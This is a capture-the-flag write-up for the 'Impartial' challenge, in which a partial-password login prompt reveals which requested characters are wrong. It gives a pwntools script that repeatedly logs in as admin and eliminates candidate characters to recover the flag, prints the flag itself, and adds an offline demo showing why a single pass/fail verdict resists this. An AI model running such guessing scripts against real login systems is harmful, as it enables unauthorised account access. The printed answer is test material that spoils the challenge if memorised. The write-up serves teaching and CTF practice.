Tags: scripting 

# Impartial

Author: [roerohan](https://github.com/roerohan)

# Requirements

- Python

# Source

```
Check out the terminal-interface for this new company! Can you uncover any secrets?

Connect with:
nc jh2i.com 50026
```

# Exploitation

Every time you try to log in as admin, it asks you for 3 letters of the password.

```
Impartial Advice and Consulting
. . . we will help you put the pieces together!

1. About
2. Login
3. Register
4. Contact
?. Exit

> 2

Please enter a username to log in.

Username: admin

For your security, please only enter a partial password.
To protect your account from hackers, enter only the characters
at position 13, 32, and 10 (separated by spaces).

Password:
```

You can build a map from each password position to the characters that are still possible in that position. When a guess for a position is rejected, remove that character from its candidates; when a guess is correct, remove all other candidates for that position. Here's a script:

```python
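from pwn import remote
import re
import string

r = remote("jh2i.com", 50026)

# 1-based view of the flag: index 0 is a placeholder, '?' marks an unknown position.
flag = [''] + list('flag{') + ['?']*50

letters = list(string.ascii_lowercase + '_}1234567890')
# Remaining candidate characters for every position of the flag.
tries = {i: letters for i in range(1, len(flag))}

# flag = [''] + list('flag{partial?pass?ord?puz?le?pieces????????????????????')
# flag{partial_password_puzzle_pieces}
# Positions that are already known keep a single candidate.
for i in range(1, len(flag)):
    if flag[i] == '?':
        continue
    tries[i] = [flag[i]]

rec = r.recvuntil(b">").decode()
print(rec, end=" ")

while True:
    # Menu option 2: Login
    res = b"2"
    r.sendline(res)
    print(res)

    rec = r.recvuntil(b"Username:").decode()
    print(rec, end=" ")

    res = b"admin"
    r.sendline(res)
    print(res)

    rec = r.recvuntil(b"Password:").decode()
    print(rec, end=" ")

    # The prompt names the three positions it wants.
    indices = [int(i) for i in re.findall(r'\d+', rec)]

    # Guess the first remaining candidate for each requested position.
    res = []

    for index in indices:
        res.append(tries[index][0])

    res = ' '.join(res)
    print(res)
    r.sendline(res.encode())

    rec = r.recvuntil(b'>').decode()
    print(rec)

    # A different menu means all three characters were right: leave it and log in again.
    if '1. Judge' in rec:
        r.sendline(b'3')
        print(''.join(flag))
        continue

    # One result line per requested position, printed before the main menu.
    x = rec.split('1. About')[0].strip().split('\n')

    for i in range(len(x)):
        t = tries[indices[i]]
        if 'WRONG' in x[i]:
            # Rejected: drop this candidate.
            tries[indices[i]] = t[1:]
        else:
            # Accepted: drop every other candidate and record the character.
            tries[indices[i]] = [t[0]]
            flag[indices[i]] = t[0]
    print(''.join(flag))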
```

When I ran the script for a while, I got this much of the flag:

```
$ python script.py
...
flag{partial?pass?ord?puz?le?pieces????????????????????
```

From here, you can possibly guess the flag.

The flag is:

```
flag{partial_password_puzzle_pieces}
```
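
The elimination rule used by the script, as an added example that is not part of the original writeup: it runs offline against a local stand-in for the login prompt and compares per-character verdicts with a single pass/fail for the whole triple. The `Oracle` class, the `recover` function and the `SECRET` value are constructed for illustration and assume the service reports a verdict for each requested character.

```python
import random
import string

ALPHABET = string.ascii_lowercase + '_}1234567890'  # candidate set used by the script above
SECRET = 'demo_secret_42'                            # constructed sample, not the real flag

class Oracle:
    """Local stand-in for the login prompt (hypothetical, not the challenge server)."""
    def __init__(self, secret, per_char_feedback, seed=0):
        self.secret, self.per_char_feedback = secret, per_char_feedback
        self.rng = random.Random(seed)

    def challenge(self):
        # Three distinct 1-based positions, as in the partial-password prompt.
        return self.rng.sample(range(1, len(self.secret) + 1), 3)

    def verify(self, positions, chars):
        ok = [self.secret[p - 1] == c for p, c in zip(positions, chars)]
        # Leaky form: one verdict per character. Hardened form: one verdict in total.
        return ok if self.per_char_feedback else all(ok)

def recover(oracle, length, max_attempts=5000):
    """Run the elimination rule; return (known characters, attempts used)."""
    cand = {p: list(ALPHABET) for p in range(1, length + 1)}
    attempts = 0
    while attempts < max_attempts and any(len(c) > 1 for c in cand.values()):
        attempts += 1
        positions = oracle.challenge()
        guess = [cand[p][0] for p in positions]
        verdict = oracle.verify(positions, guess)
        if isinstance(verdict, bool):
            # A single failure does not say which character was wrong: nothing to eliminate.
            verdict = [True] * 3 if verdict else [None] * 3
        for p, g, ok in zip(positions, guess, verdict):
            if ok is True:
                cand[p] = [g]           # confirmed: drop every other candidate
            elif ok is False:
                cand[p].remove(g)       # rejected: drop only this candidate
    known = ''.join(c[0] if len(c) == 1 else '?' for c in cand.values())
    return known, attempts

if __name__ == '__main__':
    for leaky in (True, False):
        known, used = recover(Oracle(SECRET, leaky), len(SECRET))
        print(f'per-character feedback={leaky}: {known} after {used} attempts')
```

With per-character verdicts each position costs at most one guess per candidate character, so the work grows linearly with the password length. With one verdict per attempt, a failed login no longer identifies the wrong character, and all three requested characters have to be guessed correctly at once.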

Original writeup (https://github.com/csivitu/CTF-Write-ups/tree/master/HacktivityCon%20CTF/Scripting/Impartial).